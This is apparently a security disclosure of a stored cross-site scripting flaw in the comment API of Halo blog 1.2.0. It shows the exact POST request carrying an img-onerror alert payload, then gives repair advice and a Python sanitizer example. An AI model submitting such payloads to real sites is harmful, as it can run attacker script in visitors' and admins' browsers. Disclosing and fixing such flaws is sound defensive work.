
Stored XSS on Halo blog

Created by: rank0

Environment

Server Version: 1.2.0, Admin Version: 1.2.0, Database: H2


Vulnerability details

Halo blog allows users to submit comments on blog posts. The application accepts the comment data from an untrusted source and stores and renders it without any filtering.

Step 1: submit a comment

The POST request is as follows:

POST /api/content/posts/comments HTTP/1.1
Host: 192.168.0.104:8090
Content-Length: 132
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.0.104:8090
Referer: http://192.168.0.104:8090/archives/hello-halo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"author":"guest1","authorUrl":"http://test.com","email":"guest@gmail.com","content":"<img src=1 onerror=alert(/test/)>","postId":1}

Step 2: view the blog post

After this comment has been submitted, when the admin (or any other user) visits the blog post, the attacker-supplied script executes in the victim user's browser.


Code: src/main/java/run/halo/app/controller/content/api/PostController.java

Suggestions for repair

  • Encode untrusted request data (comment content, author name, author URL) appropriately for the context in which it is output
  • Filter rich text with a widely used security library for the application's programming language (an HTML sanitizer with a tag and attribute allowlist)
  • Escape special characters with the language's secure escaping library rather than hand-written code
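
As an added illustration of the repair options above (not Halo's own code), the following Python shows both approaches applied to the comment body captured in step 1: plain output encoding, and an allowlist sanitizer that drops the img tag and its onerror handler while keeping basic formatting. The allowed tag set, attribute set and function names are assumptions chosen for this example.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist for comment bodies: anything else (img, script, on* handlers) is dropped.
ALLOWED_TAGS = {"b", "i", "em", "strong", "code", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}

def encode_for_html(text):  # option 1 in the report: entity-encode before output
    return html.escape(text, quote=True)

def safe_url(url):  # only absolute http(s) URLs; rejects javascript: and data:
    parsed = urlparse(url.strip())
    return parsed.scheme.lower() in {"http", "https"} and bool(parsed.netloc)

class CommentSanitizer(HTMLParser):
    # Option 2 in the report: rebuild the markup, keeping only allowlisted parts.
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # the tag and every attribute on it are discarded
        kept = ""
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value and safe_url(value):
                kept += ' %s="%s"' % (name, encode_for_html(value))
        self.out.append("<%s%s>" % (tag, kept))
    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append("</%s>" % tag)
    def handle_data(self, data):
        self.out.append(encode_for_html(data))  # text nodes are always encoded

def sanitize_html(fragment):
    parser = CommentSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)

def sanitize_comment(raw_json):
    # Apply the policy field by field to a comment body like the one in the report.
    c = json.loads(raw_json)
    return {"author": encode_for_html(c["author"]),
            "authorUrl": c["authorUrl"] if safe_url(c["authorUrl"]) else "",
            "content": sanitize_html(c["content"]), "postId": int(c["postId"])}

# Constructed sample: the request body captured in step 1.
PAYLOAD = '{"author":"guest1","authorUrl":"http://test.com","email":"guest@gmail.com","content":"<img src=1 onerror=alert(/test/)>","postId":1}'
```

Encoding renders the payload as visible text, while the sanitizer removes it entirely; either way nothing reaches the page as executable markup.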